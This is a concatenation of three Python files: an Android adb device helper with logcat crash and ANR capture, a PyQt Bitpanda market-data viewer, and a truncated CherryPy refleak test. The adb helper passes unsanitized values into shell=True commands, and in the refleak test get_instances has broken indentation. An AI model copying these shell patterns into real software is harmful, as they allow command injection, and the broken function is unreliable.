        # Full raw dumpsys output this App was parsed from (if any).
        self.raw = None

    @classmethod
    def from_raw(cls, package, raw_data):
        """Build an App by scanning raw `dumpsys package <pkg>` output.

        Scans until versionCode, versionName and the activity following the
        'android.intent.action.MAIN:' marker have all been found.

        NOTE(review): version_code keeps the whole 'versionCode=NNN' token
        while version_name keeps only the value — looks inconsistent, but
        callers may depend on it; confirm before changing.
        """
        app = cls(package)
        app.raw = raw_data
        lines = raw_data.split('\n')
        main_action_line = None
        for idx, text in enumerate(lines):
            if 'versionCode' in text:
                app.version_code = text.strip().split(' ')[0]
            if 'versionName' in text:
                app.version_name = text.strip().split('=')[1]
            if 'android.intent.action.MAIN:' in text:
                # Launch activity is listed on the line after the marker.
                main_action_line = idx + 1
            if app.version_name and app.version_code and main_action_line:
                activity_line = lines[main_action_line]
                app.launch_activity = activity_line.strip().split()[1]
                break
        return app
class Device:
    """
    One connected Android device, driven through the module-level ``adb``
    binary (resolved by check_android_home()). Provides logcat capture with
    crash/ANR detection plus assorted shell/dumpsys helpers.
    """

    def __init__(self, device_id):
        self.device_id = device_id
        self.state = None
        self.product = None
        self.model = None
        # Internal logcat state.
        self._log_process = None
        self._log_cache = []
        self._log_crash_cache = []
        self._crashed_pid = None
        self._crashed_package = None
        self._log_file = None
        self._device_info = None
        self._app_info = None
        # True while crash_checker is accumulating a stack trace.
        self.start_catch_log = False

    @property
    def log_file(self):
        """Path of the logcat capture file (set by start_log())."""
        return self._log_file

    @classmethod
    def from_adb_line(cls, line):
        """Parse one line of `adb devices -l` output into a Device.

        Raises:
            ADBError: the line does not contain at least id and state.
        """
        device_info = [info for info in line.split(' ') if info]
        if len(device_info) < 2:
            raise ADBError(f'Read device info line error. {line}')
        _device = cls(device_info[0])
        _device.state = device_info[1]
        # Remaining tokens look like 'model:Pixel_3'; attach them as attributes.
        for info in device_info[2:]:
            info_kv = info.split(':')
            if len(info_kv) >= 2:
                setattr(_device, info_kv[0], info_kv[1])
            else:
                logger.error(f'Read device info error: unknown format {info_kv}')
        return _device

    def install(self, apk_file):
        """Install (or reinstall, -r) an APK on this device."""
        subprocess.run(f'{adb} -s {self.device_id} install -r {apk_file}', shell=True)

    def push(self, src, dst):
        """Copy a local file onto the device."""
        # BUG FIX: shell=True was missing; subprocess.run with a plain string
        # and no shell treats the WHOLE string as one executable name, so the
        # call could never succeed.
        subprocess.run(f'{adb} -s {self.device_id} push {src} {dst}', shell=True)

    def pull(self, src, dst):
        """Copy a file from the device to the local machine."""
        # BUG FIX: same missing shell=True as push().
        subprocess.run(f'{adb} -s {self.device_id} pull {src} {dst}', shell=True)

    def start_log(self):
        """Start a background logcat reader, replacing any previous capture."""
        self.stop_log()
        self._log_file = os.path.abspath(os.path.join(tmp_dir, f'android_log_{self.device_id}.log'))
        p = subprocess.Popen(f'{adb} -s {self.device_id} logcat', shell=True, stdout=subprocess.PIPE)

        def log_handler(logcat_process):
            # Mirror logcat to a file and emit to the lyrebird UI in batches
            # of 10 lines, feeding every line through the crash/ANR checkers.
            log_file = codecs.open(self._log_file, 'w', 'utf-8')
            self._log_process = logcat_process
            while True:
                line = logcat_process.stdout.readline()
                line = line.decode(encoding='UTF-8', errors='ignore')
                if not line:
                    # EOF: logcat exited (device gone or stop_log() called).
                    lyrebird.emit('android-log', self._log_cache)
                    log_file.close()
                    return
                self._log_cache.append(line)
                self.crash_checker(line)
                self.anr_checker(line)
                if len(self._log_cache) >= 10:
                    lyrebird.emit('android-log', self._log_cache)
                    log_file.writelines(self._log_cache)
                    log_file.flush()
                    self._log_cache = []

        threading.Thread(target=log_handler, args=(p,)).start()

    def get_package_from_pid(self, pid):
        """Best-effort lookup of the package owning *pid* via `ps | grep`."""
        p = subprocess.run(f'{adb} -s {self.device_id} shell ps | grep {pid}', shell=True,
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if not p.stdout.decode():
            return ''
        # Package name is the last column of the matching ps line.
        package = p.stdout.decode().strip().split()[-1]
        package = package.replace(':', '')
        package = package.replace('/', '')
        return package

    def crash_checker(self, line):
        """Accumulate 'FATAL EXCEPTION' logcat lines; on completion, write the
        trace to disk and, if it belongs to the configured target package,
        publish/report it via lyrebird.

        NOTE(review): `line.find(...) > 0` misses a match at column 0; logcat
        lines normally start with a timestamp, so this is presumably fine —
        confirm before tightening to `>= 0`.
        """
        if line.find('FATAL EXCEPTION') > 0:
            self.start_catch_log = True
            _crashed_pid = line.strip().split()[2]
            self._crashed_package = self.get_package_from_pid(_crashed_pid)
            self._log_crash_cache.append(line)
        elif line.find('AndroidRuntime') > 0 and self.start_catch_log:
            self._log_crash_cache.append(line)
        elif self.start_catch_log:
            # First non-AndroidRuntime line after the trace: flush it.
            _crash_file = os.path.abspath(os.path.join(
                crash_dir,
                f'android_crash_{self.device_id}_{self._crashed_package}.log'
            ))
            with codecs.open(_crash_file, 'w', 'utf-8') as f:
                f.write(''.join(self._log_crash_cache))
            target_package_name = config.load().package_name
            if self._crashed_package == target_package_name:
                crash_info = {
                    'device_id':self.device_id,
                    'log': self._log_crash_cache,
                    'log_file_path': _crash_file
                }
                lyrebird.publish('android.crash', crash_info)
                title = f'Android device {self.device_id} crashed!\n'
                desc = title + 'Crash log:\n\n' + ''.join(self._log_crash_cache)
                lyrebird.event.issue(title, desc)
            self.start_catch_log = False
            self._log_crash_cache = []
        else:
            return

    def anr_checker(self, line):
        """Detect ActivityManager ANR lines, pull /data/anr/traces.txt and
        report it when it belongs to the configured target package."""
        if ('ANR' not in line) or ('ActivityManager' not in line):
            return
        anr_package = line.strip().split()[-2]
        # Valid Java package name: dot-separated lowercase identifiers.
        re_str = r"^([a-z_]{1}[a-z0-9_]*(\.[a-z_]{1}[a-z0-9_]*)*)$"
        # Check pkg name
        if re.match(re_str, anr_package) is None:
            return
        anr_file_name = os.path.join(anr_dir, f'android_anr_{self.device_id}_{anr_package}.log')
        p = subprocess.run(f'{adb} -s {self.device_id} pull "/data/anr/traces.txt" {anr_file_name}',
                           shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if p.returncode != 0:
            logger.error('Catch ANR log error!\n' + p.stderr.decode())
            return
        # check whether pid of the anr_package exists or not
        with codecs.open(anr_file_name, 'r', 'utf-8') as f:
            anr_pid_line = f.readline()
            # expected anr_pid_line: ----- pid 21335 at 2019-06-24 16:21:15 -----
            # BUG FIX: guard against EOF — readline() returns '' forever at
            # end of file, so the original loop could spin indefinitely when
            # traces.txt contains no 'pid' line.
            while anr_pid_line and 'pid' not in anr_pid_line:
                anr_pid_line = f.readline()
            if not anr_pid_line:
                logger.error('No pid line found in %s' % anr_file_name)
                return
            _anr_pid = anr_pid_line.strip().split()[2]
            anr_package = self.get_package_from_pid(_anr_pid)
        target_package_name = config.load().package_name
        if anr_package == target_package_name:
            with codecs.open(anr_file_name, 'r', 'utf-8') as f:
                log_anr_cache = f.readlines()
            anr_info = {
                'device_id':self.device_id,
                'log': log_anr_cache,
                'log_file_path': anr_file_name
            }
            lyrebird.publish('android.crash', anr_info)
            title = f'Application {anr_package} not responding on Android device {self.device_id}!\n'
            desc = title + 'ANR log:\n\n' + ''.join(log_anr_cache)
            lyrebird.event.issue(title, desc)

    @property
    def device_info(self):
        """Cached `getprop` output (list of lines)."""
        if not self._device_info:
            self._device_info = self.get_properties()
        return self._device_info

    def get_properties(self):
        """Return `adb shell getprop` output lines, or None on failure."""
        p = subprocess.run(f'{adb} -s {self.device_id} shell getprop', shell=True, stdout=subprocess.PIPE)
        if p.returncode == 0:
            return p.stdout.decode().split('\n')

    def get_all_packages(self):
        """Return every installed package name (empty list on failure)."""
        p = subprocess.run(f'{adb} -s {self.device_id} shell pm list packages', shell=True, stdout=subprocess.PIPE)
        res = []
        if p.returncode == 0:
            output = p.stdout.decode()
            # Lines look like 'package:com.example.app'.
            res = [item.split(':')[1].strip() for item in output.strip().split('\n') if item]
        return res

    def package_info(self, package_name):
        """Return an App parsed from `dumpsys package`; launch activity may be
        overridden by the 'package.launch.activity' config key.

        Raises:
            ADBError: the dumpsys command failed.
        """
        p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys package {package_name}', shell=True,
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if p.returncode != 0:
            raise ADBError(p.stderr.decode())
        app = App.from_raw(package_name, p.stdout.decode())
        if config.get_config('package.launch.activity'):
            app.launch_activity = config.get_config('package.launch.activity')
        return app

    def package_meminfo(self, package_name):
        """Return `dumpsys meminfo <pkg>` output lines, or None on failure."""
        p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys meminfo {package_name}', shell=True,
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if p.returncode == 0:
            return p.stdout.decode().split('\n')

    def device_cpuinfo(self):
        """Return `dumpsys cpuinfo` output lines, or None on failure."""
        p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys cpuinfo', shell=True, stdout=subprocess.PIPE)
        if p.returncode == 0:
            return p.stdout.decode().split('\n')

    def stop_log(self):
        """Kill the logcat process, which also ends the reader thread at EOF."""
        if self._log_process:
            self._log_process.kill()
            self._log_process = None

    def take_screen_shot(self):
        """Capture a PNG screenshot; return its metadata dict, or {} on failure."""
        if not os.path.exists(screenshot_dir):
            os.makedirs(screenshot_dir)
        timestamp = int(time.time())
        screen_shot_file = os.path.abspath(os.path.join(screenshot_dir, f'android_screenshot_{self.device_id}_{timestamp}.png'))
        p = subprocess.run(f'{adb} -s {self.device_id} exec-out screencap -p > {screen_shot_file}', shell=True)
        if p.returncode == 0:
            return dict({
                'screen_shot_file': screen_shot_file,
                'device_id': self.device_id,
                'timestamp': timestamp
            })
        return {}

    def get_device_ip(self):
        """Return the wlan0 IPv4 address, or '' if not found.

        Raises:
            ADBError: the `ip` command failed.
        """
        p = subprocess.run(f'{adb} -s {self.device_id} shell ip -o -4 address', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if p.returncode != 0:
            raise ADBError(p.stderr.decode())
        output = [line.strip() for line in p.stdout.decode().strip().split('\n')]
        for net_line in output:
            if 'wlan0' in net_line:
                ipv4_list = net_line.split()
                break
        else:
            return ''
        for index, char in enumerate(ipv4_list):
            # ipv4_address, which we need, is behind of 'inet'
            if char == 'inet':
                # example of ipv4_address: 192.168.110.111/23
                return ipv4_list[index+1].split('/')[0]
        return ''

    def get_device_resolution(self):
        """Return the initial display resolution (e.g. '1080x1920'), or ''.

        Raises:
            ADBError: the dumpsys command failed.
        """
        p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys window displays', shell=True, \
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if p.returncode != 0:
            raise ADBError(p.stderr.decode())
        output = [line.strip() for line in p.stdout.decode().strip().split('\n')]
        for index, char in enumerate(output):
            if char and char.startswith('Display'):
                # display_str, which we need, is in the next line of 'Display'
                display_str = output[index+1]
                break
        else:
            return ''
        # example of display: 'init=1080x1920 420dpi cur=1080x1920 app=1080x1794 rng=1080x1017-1794x1731',
        for resolution_str in display_str.split():
            if resolution_str.startswith('init'):
                return resolution_str[len('init='):]
        return ''

    def get_release_version(self):
        """Return the Android release version string (e.g. '10').

        Raises:
            ADBError: the getprop command failed.
        """
        p = subprocess.run(f'{adb} -s {self.device_id} shell getprop ro.build.version.release', shell=True, \
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if p.returncode != 0:
            raise ADBError(p.stderr.decode())
        return p.stdout.decode().strip()

    def to_dict(self):
        """Serialize public attributes plus selected system properties."""
        device_info = {k: self.__dict__[k] for k in self.__dict__ if not k.startswith('_')}
        # get additional device info
        prop_lines = self.device_info
        if not prop_lines:
            return device_info
        for line in prop_lines:
            # Baseband version
            if 'ro.build.expect.baseband' in line:
                baseband = line[line.rfind('[')+1:line.rfind(']')].strip()
                device_info['baseBand'] = baseband
            # Build ID
            if 'ro.build.id' in line:
                build_id = line[line.rfind('[') + 1:line.rfind(']')].strip()
                device_info['buildId'] = build_id
            # Android release version
            if 'ro.build.version.release' in line:
                build_version = line[line.rfind('[') + 1:line.rfind(']')].strip()
                device_info['releaseVersion'] = build_version
        return device_info

    def adb_command_executor(self, command):
        """Run an arbitrary shell command; 'adb ...' commands are rewritten to
        target this device via '-s'. Returns the CompletedProcess."""
        command = command.strip()
        isAdbCommand = command.startswith('adb ')
        if isAdbCommand:
            command_adb, command_options = command.split(' ', 1)
            command = f'{command_adb} -s {self.device_id} {command_options}'
        p = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        return p
def devices():
    """Return {device_id: Device} for everything `adb devices -l` reports."""
    proc = subprocess.run(f'{adb} devices -l', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout_text = proc.stdout.decode()
    stderr_text = proc.stderr.decode()
    online_devices = {}
    # ADB command error
    if proc.returncode != 0:
        logger.error('Get devices list error' + stderr_text)
        return online_devices
    valid_lines = [item for item in stdout_text.split('\n') if item and item not in ignore_devices_line]
    # The first line is the "List of devices attached" header; skip it.
    for device_line in valid_lines[1:]:
        parsed = Device.from_adb_line(device_line)
        online_devices[parsed.device_id] = parsed
    return online_devices
|
main.py
|
import sys, os
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.uic import loadUi
import random
import numpy as np
from mplwidget import MplWidget
import websocket
import threading
import json
import pprint
import urllib3
import csv
import matplotlib.dates as mdates
import matplotlib.ticker as mticker
from mpl_finance import candlestick_ohlc
import re
class Dialog(QtWidgets.QMainWindow):
    """Main window of the Bitpanda exchange viewer (loads ui/Main.ui).

    NOTE(review): every network call goes through the module-global `http`
    (urllib3.PoolManager) created in the __main__ block — constructing a
    Dialog before that exists fails on the first request; confirm intended.
    """
    def __init__(self):
        # Module-global volume cache; only ever holds its placeholder here.
        global pair24hVolume
        pair24hVolume = np.array(['0'])
        QtWidgets.QMainWindow.__init__(self)
        ui_path = os.path.dirname(os.path.abspath(__file__))
        loadUi(os.path.join(ui_path,"ui/Main.ui"),self)
        self.StatusMessage = "No Connection to Bitpanda API"
        self.statusBar.showMessage(self.StatusMessage)
        # Wire UI signals to their handlers.
        self.bDeapthPlus.clicked.connect(self.zoomInDeapthChart)
        self.bDeapthMinus.clicked.connect(self.zoomOutDeapthChart)
        self.tabWidget.currentChanged.connect(self.tabWidgetChanged)
        self.cBTraidPairs.currentIndexChanged.connect(self.cBTraidPairsChanged)
        self.chBNow.stateChanged.connect(self.checkBoxNowChanged)
        self.bImport.clicked.connect(self.csvImport)
        # Depth-chart zoom as a fraction of the mid price.
        self.zoomDeapthChart = 0.1
        # Loose 'YYYY-MM-DD' shape check (any characters, only lengths fixed).
        self.dateFormat = re.compile('.{4}-.{2}-.{2}')
        # Last known server time (ISO8601); refreshed by getServerTime().
        self.time = '2019-08-07T11:00:00.080Z'
        # Poll the active tab every 10 seconds.
        self.RepeatingEventTimer = QtCore.QTimer()
        self.RepeatingEventTimer.timeout.connect(self.RepeatingEvents)
        self.RepeatingEventTimer.start(10000)
        self.getServerTime()
        self.fillInitial()
        # sub=json.dumps({'type': 'SUBSCRIBE','channels': [{'name': 'MARKET_TICKER','instrument_codes': ['PAN_BTC','BTC_EUR','MIOTA_BTC','MIOTA_EUR','ETH_EUR']}]})
        # ws.send(sub)
    def RepeatingEvents(self):
        """Timer tick: refresh the data-view tab; other tabs only print."""
        if self.tabWidget.currentIndex() == self.tabWidget.indexOf(self.tabHome):
            print("Home")
        elif self.tabWidget.currentIndex() == self.tabWidget.indexOf(self.tabDataView):
            self.cBTraidPairsChanged()
        elif self.tabWidget.currentIndex() == self.tabWidget.indexOf(self.tabDataImport):
            print("DataImport")
        elif self.tabWidget.currentIndex() == self.tabWidget.indexOf(self.tabConfig):
            print("Config")
    def tabWidgetChanged(self,i):
        """Slot for tab switches; currently just logs the active tab."""
        if i == self.tabWidget.indexOf(self.tabHome):
            print("Home")
        elif i == self.tabWidget.indexOf(self.tabDataView):
            print("DataView")
            #self.plotDeapthChart(self.zoomDeapthChart)
        elif i == self.tabWidget.indexOf(self.tabDataImport):
            print("DataImport")
        elif i == self.tabWidget.indexOf(self.tabConfig):
            print("Config")
    def cBTraidPairsChanged(self):
        """Fetch daily candles for the selected pair; update volume labels and both charts."""
        res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/candlesticks/'+self.cBTraidPairs.currentText()+'?unit=DAYS&period=1&from=2019-08-07T11:00:00.080Z&to='+self.time)
        data=json.loads(res.data.decode('utf-8'))
        currency = self.cBTraidPairs.currentText()
        [_,csell]=currency.split("_")
        # Newest candle last: data[-1] is today, data[-2] yesterday, etc.
        self.lVolume24h.setText(str(float(data[-1]['volume']))+' '+csell)
        self.lVolume1Days.setText(str(float(data[-2]['volume']))+' '+csell)
        self.lVolume2Days.setText(str(float(data[-3]['volume']))+' '+csell)
        self.lVolume3Days.setText(str(float(data[-4]['volume']))+' '+csell)
        self.lVolume4Days.setText(str(float(data[-5]['volume']))+' '+csell)
        self.lVolume5Days.setText(str(float(data[-6]['volume']))+' '+csell)
        #self.lVolume24h.setText(str(pair24hVolume[self.cBTraidPairs.currentIndex()]))
        self.plotDeapthChart(self.zoomDeapthChart)
        self.plotCandleChart(data)
    def plotCandleChart(self,data):
        """Draw a Heikin-Ashi candle chart from 4-hour candles.

        NOTE(review): the `data` argument is immediately overwritten by a
        fresh API request below — the parameter is effectively unused.
        """
        res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/candlesticks/'+self.cBTraidPairs.currentText()+'?unit=HOURS&period=4&from=2019-08-08T11:00:00.080Z&to='+self.time)
        data=json.loads(res.data.decode('utf-8'))
        n=len(data)
        quotes = np.empty((n,0)).tolist()
        i=0
        # Candle Chart
        # for instance in data:
        #     quotes[i].append(mdates.datestr2num(str(instance['time'][0:19].replace('T',' '))))
        #     quotes[i].append(float(instance['open']))
        #     quotes[i].append(float(instance['high']))
        #     quotes[i].append(float(instance['low']))
        #     quotes[i].append(float(instance['close']))
        #     i+=1
        # Heikin Ashi Chart
        for instance in data:
            quotes[i].append(mdates.datestr2num(str(instance['time'][0:19].replace('T',' '))))
            if(i == 0):
                quotes[i].append(float(instance['open']))
            else:
                # HA open = midpoint of the previous HA candle's open/close.
                quotes[i].append(float((quotes[i-1][1]+quotes[i-1][4])/2.0))
            quotes[i].append(np.maximum(float(instance['high']),quotes[i][1]))
            quotes[i].append(np.minimum(float(instance['low']),quotes[i][1]))
            # HA close = average of open/high/low/close.
            quotes[i].append(float((float(instance['close'])+float(instance['open'])+float(instance['high'])+float(instance['low']))/4.0))
            i+=1
        self.mplCandleChart.canvas.axes.clear()
        candlestick_ohlc(self.mplCandleChart.canvas.axes, quotes,width=0.05)
        self.mplCandleChart.canvas.axes.set_xlabel('Date')
        self.mplCandleChart.canvas.axes.set_ylabel('Price')
        self.mplCandleChart.canvas.draw()
    def plotDeapthChart(self,cmdZoom):
        """Plot cumulative order-book depth (bids green, asks red), windowed to ±cmdZoom around the mid price."""
        res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/order-book/'+self.cBTraidPairs.currentText()+'?level=2')
        data=json.loads(res.data.decode('utf-8'))
        currency=data['instrument_code']
        [cbuy,csell]=currency.split("_")
        bids=data['bids']
        asks=data['asks']
        bidprices = np.array([])
        askprices = np.array([])
        bidamount = np.array([])
        askamount = np.array([])
        # Bids are prepended so the arrays end up sorted ascending by price,
        # with amounts accumulated away from the mid price.
        for bid in bids:
            bidprices=np.insert(bidprices,0,float(bid['price']))
            try:
                bidamount=np.insert(bidamount,0,bidamount[0]+float(bid['amount']))
            except:
                bidamount=np.insert(bidamount,0,float(bid['amount']))
        for ask in asks:
            askprices=np.append(askprices,float(ask['price']))
            try:
                askamount=np.append(askamount,askamount[-1]+float(ask['amount']))
            except:
                askamount=np.append(askamount,float(ask['amount']))
        # Mid price between best bid (last of bidprices) and best ask (first of askprices).
        middleprice=(bidprices[-1]+askprices[0])/2
        #prices=np.append(bidprices,askprices)
        #amount=np.append(bidamount,askamount)
        self.mplDeapthChart.canvas.axes.clear()
        self.mplDeapthChart.canvas.axes.plot(bidprices,bidamount,'g',askprices,askamount,'r')
        self.mplDeapthChart.canvas.axes.set_xlim([(1-cmdZoom)*middleprice,(1+cmdZoom)*middleprice])
        self.mplDeapthChart.canvas.axes.set_ylim([0,np.maximum(bidamount[self.findNearestIndex(bidprices,(1-cmdZoom)*middleprice)]*1.1,1.1*askamount[self.findNearestIndex(askprices,(1+cmdZoom)*middleprice)])])
        #self.mplDeapthChart.canvas.axes.set_title('Deapth-Chart '+ currency+'\nMiddle Price:'+ str(middleprice)+csell)
        self.lDeapthPrice.setText(str(middleprice)+' '+csell)
        self.mplDeapthChart.canvas.axes.set_xlabel('Price ['+csell+']')
        self.mplDeapthChart.canvas.axes.set_ylabel('Amount ['+cbuy+']')
        self.mplDeapthChart.canvas.draw()
    def zoomInDeapthChart(self):
        """Narrow the depth-chart window by 10 percentage points (min 0.1)."""
        if (self.zoomDeapthChart-0.1) > 0.001:
            self.zoomDeapthChart-=0.1
            self.plotDeapthChart(self.zoomDeapthChart)
        print(self.zoomDeapthChart)
    def zoomOutDeapthChart(self):
        """Widen the depth-chart window by 10 percentage points."""
        self.zoomDeapthChart+=0.1
        self.plotDeapthChart(self.zoomDeapthChart)
        print(self.zoomDeapthChart)
    def csvImport(self):
        """Export candles for the chosen pair/period to a CSV, one API request per day.

        The 'from'/'to' text boxes must hold 'YYYY-MM-DD' dates; progress is
        shown on pBImport. With chBNow checked the final request ends at the
        current server time.
        """
        self.pBImport.setValue(0)
        [number, period] = self.cBCandlestickPeriod.currentText().split(' ')
        # Validate both dates: loose pattern plus length and integer checks.
        if self.dateFormat.match(self.tBFrom.displayText()) and self.dateFormat.match(self.tBTo.displayText()) and len(self.tBFrom.displayText())==10 and len(self.tBTo.displayText())==10:
            [j,m,d]=self.tBFrom.displayText().split('-')
            [j1,m1,d1]=self.tBTo.displayText().split('-')
            try:
                int(j)
                int(j1)
                int(m)
                int(m1)
                int(d)
                int(d1)
            except:
                print("No Int")
                return
            fromDateNum = mdates.datestr2num(self.tBFrom.displayText())
            toDateNum = mdates.datestr2num(self.tBTo.displayText())
        else:
            print("No Valid Pattern")
            return
        csvDatei=open('import/'+self.cBTraidPairs_2.currentText()+'p'+number+period+'f'+self.tBFrom.displayText()+'t'+self.tBTo.displayText()+'.csv','w+',newline='')
        csvwriter = csv.writer(csvDatei)
        csvwriter.writerow(['high','low','open','close','volume','time'])
        # One iteration per day in [from, to]; the API rejects larger ranges.
        diffDays = toDateNum-fromDateNum
        itterations = np.ceil(diffDays)
        print(itterations)
        if itterations == 1:
            stop = toDateNum
            start = fromDateNum
        else:
            start = fromDateNum
            stop = start+1
        if self.chBNow.checkState() == 2:
            # Extra iteration for the partial current day up to server time.
            itterations +=1
        for i in range(0,int(itterations)):
            print(str(mdates.num2date(start))[0:10])
            print(str(mdates.num2date(stop))[0:10])
            if self.chBNow.checkState() == 2 and i == int(itterations)-1:
                self.getServerTime()
                res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/candlesticks/'+self.cBTraidPairs_2.currentText()+'?unit='+period+'&period='+number+'&from='+self.time[0:10]+'T00:00:00.080Z&to='+self.time)
                stop = start
            else:
                res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/candlesticks/'+self.cBTraidPairs_2.currentText()+'?unit='+period+'&period='+number+'&from='+str(mdates.num2date(start))[0:10]+'T00:00:00.080Z&to='+str(mdates.num2date(stop))[0:10]+'T00:00:00.090Z')
                start = stop
                if start+1<toDateNum:
                    stop = start+1
                else:
                    stop = toDateNum
            data=json.loads(res.data.decode('utf-8'))
            try:
                if data['error'] == 'CANDLESTICKS_TIME_RANGE_TOO_BIG':
                    print("CANDLESTICKS_TIME_RANGE_TOO_BIG")
                    return
            except:
                pass
            for interval in data:
                # Keep only OHLCV + time-of-day columns in the CSV.
                interval.pop('last_sequence')
                interval.pop('granularity')
                interval.pop('instrument_code')
                interval['time']=interval['time'][11:23]
                csvwriter.writerow(interval.values())
            self.pBImport.setValue(int((i+1)/float(itterations)*100))
        csvDatei.close()
    def fillInitial(self):
        """Populate combo boxes and date fields; fetch the tradable pairs from the API."""
        # Fill Candlestick Periods
        self.cBCandlestickPeriod.addItem("1 MINUTES")
        self.cBCandlestickPeriod.addItem("5 MINUTES")
        self.cBCandlestickPeriod.addItem("15 MINUTES")
        self.cBCandlestickPeriod.addItem("30 MINUTES")
        self.cBCandlestickPeriod.addItem("1 HOURS")
        self.cBCandlestickPeriod.addItem("4 HOURS")
        self.cBCandlestickPeriod.addItem("1 DAYS")
        self.cBCandlestickPeriod.addItem("1 WEEKS")
        self.cBCandlestickPeriod.addItem("1 MONTHS")
        # Fill textBoxes
        self.tBFrom.setText("2019-08-07")
        self.tBTo.setText(self.time[0:10])
        # Fill Traiding Pairs
        res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/instruments')
        data=json.loads(res.data.decode('utf-8'))
        for pair in data:
            self.cBTraidPairs.addItem(pair['base']['code']+"_"+pair['quote']['code'])
            self.cBTraidPairs_2.addItem(pair['base']['code']+"_"+pair['quote']['code'])
    def getServerTime(self):
        """Refresh self.time with the exchange's current ISO8601 server time."""
        res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/time')
        data=json.loads(res.data.decode('utf-8'))
        self.time = data['iso']
    def findNearestIndex(self,array, value):
        """Return the index of the element of *array* closest to *value*."""
        array = np.asarray(array)
        idx = (np.abs(array - value)).argmin()
        # return (array[idx],idx)
        return idx
    def checkBoxNowChanged(self):
        """Lock the 'to' date to the current server date while 'now' is checked."""
        if self.chBNow.checkState() == 2:
            self.tBTo.setEnabled(False)
            self.tBTo.setText(self.time[0:10])
        else:
            self.tBTo.setEnabled(True)
def on_message(ws, message):
    """Websocket callback: print every message; persist all but heartbeats
    and price-point updates to the module-global `ffile`."""
    msg = json.loads(message)
    print(msg)
    if msg['type'] not in ("HEARTBEAT", "PRICE_POINT_UPDATES"):
        ffile.write('\n{}'.format(message))
def on_error(ws, error):
    """Websocket callback: report an error on stdout."""
    print("Error")
    print('ERROR: {}'.format(error))
def on_close(ws):
    """Websocket callback: log that the connection closed."""
    print("### closed ###")
def on_open(ws):
    """Websocket callback: log that the connection opened."""
    print("### conection opend ###")
def startWebSocket():
    """Run the module-global websocket client until closed (blocking; meant for a worker thread)."""
    ws.run_forever(suppress_origin=1,ping_timeout = 20)
def startWindow():
    """Show the module-global main window.

    NOTE(review): not called anywhere in the visible code — appears unused.
    """
    window.show()
if __name__ == "__main__":
    # Load Config (with-statement closes the handle; the original leaked it).
    with open("config.json", "r") as config_file:
        cdata = json.load(config_file)
    # Starting: shared HTTP pool, used by Dialog via the module-global `http`.
    http = urllib3.PoolManager()
    # websocket Config and Start
    websocket.enableTrace(cdata['enableWebsocketTrace'])
    ws = websocket.WebSocketApp(cdata['url'],
                                on_open = on_open,
                                on_message = on_message,
                                on_error = on_error,
                                on_close = on_close)
    socketThread = threading.Thread(target=startWebSocket)
    socketThread.start()
    ffile = open("recv.txt", "a+")
    # App Start
    app = QtWidgets.QApplication(sys.argv)
    window = Dialog()
    # BUG FIX: the original did Thread(target=window.show()), which *called*
    # show() immediately and started a pointless thread with target=None.
    # Qt widgets must be driven from the main thread, so just show it here.
    window.show()
    # NOTE(review): app.exec_() is never invoked, so the Qt event loop does
    # not run while the console loop below owns the main thread — confirm.
    check = 0
    while check == 0:
        inp = input()
        if inp == "sub":
            sub = json.dumps({"type": "SUBSCRIBE","channels": [{"name": "PRICE_TICKS","instrument_codes": ["BTC_EUR","ETH_EUR"]}]})
            ws.send(sub)
        if inp == "unsub":
            unsub = json.dumps({"type": "UNSUBSCRIBE","channels": ["PRICE_TICKS"]})
            ws.send(unsub)
        if inp == "close":
            check = 1
            ws.close()
            ffile.close()
    #sys.exit(app.exec_())
|
test_refleaks.py
|
"""Tests for refleaks."""
from cherrypy.test import test
# Presumably makes the in-tree cherrypy win over any installed copy; must run
# before the cherrypy imports below — confirm against cherrypy.test.test.
test.prefer_parent_path()
import gc
import httplib  # NOTE: Python 2 module (http.client in Python 3); this file is py2 code.
import threading
import cherrypy
from cherrypy import _cprequest
# Sentinel attached to each request so every request thread holds a reference.
data = object()
def get_instances(cls):
return [x for x in gc.get_objects() if isinstance(x, cls)]
def setup_server():
    """Mount a Root app exposing / (touches request state) and /gc_stats."""
    class Root:
        def index(self, *args, **kwargs):
            # Attach the module-level sentinel so the handling thread holds a
            # thread-local reference for the statistics below to account for.
            cherrypy.request.thing = data
            return "Hello world!"
        index.exposed = True
        def gc_stats(self):
            """Report uncollectable garbage and stray Request/Response refs.

            A leak-free server returns exactly "Statistics:" with nothing
            appended.
            """
            output = ["Statistics:"]
            # Uncollectable garbage
            # gc_collect isn't perfectly synchronous, because it may
            # break reference cycles that then take time to fully
            # finalize. Call it twice and hope for the best.
            gc.collect()
            unreachable = gc.collect()
            if unreachable:
                output.append("\n%s unreachable objects:" % unreachable)
                # Tally the unreachable garbage by type.
                trash = {}
                for x in gc.garbage:
                    trash[type(x)] = trash.get(type(x), 0) + 1
                # NOTE: dict.iteritems — Python 2 only; this whole file is py2.
                trash = [(v, k) for k, v in trash.iteritems()]
                trash.sort()
                for pair in trash:
                    output.append("    " + repr(pair))
            # Request references
            reqs = get_instances(_cprequest.Request)
            lenreqs = len(reqs)
            if lenreqs < 2:
                output.append("\nMissing Request reference. Should be 1 in "
                              "this request thread and 1 in the main thread.")
            elif lenreqs > 2:
                output.append("\nToo many Request references (%r)." % lenreqs)
                for req in reqs:
                    output.append("Referrers for %s:" % repr(req))
                    for ref in gc.get_referrers(req):
                        if ref is not reqs:
                            output.append("    %s" % repr(ref))
            # Response references
            resps = get_instances(_cprequest.Response)
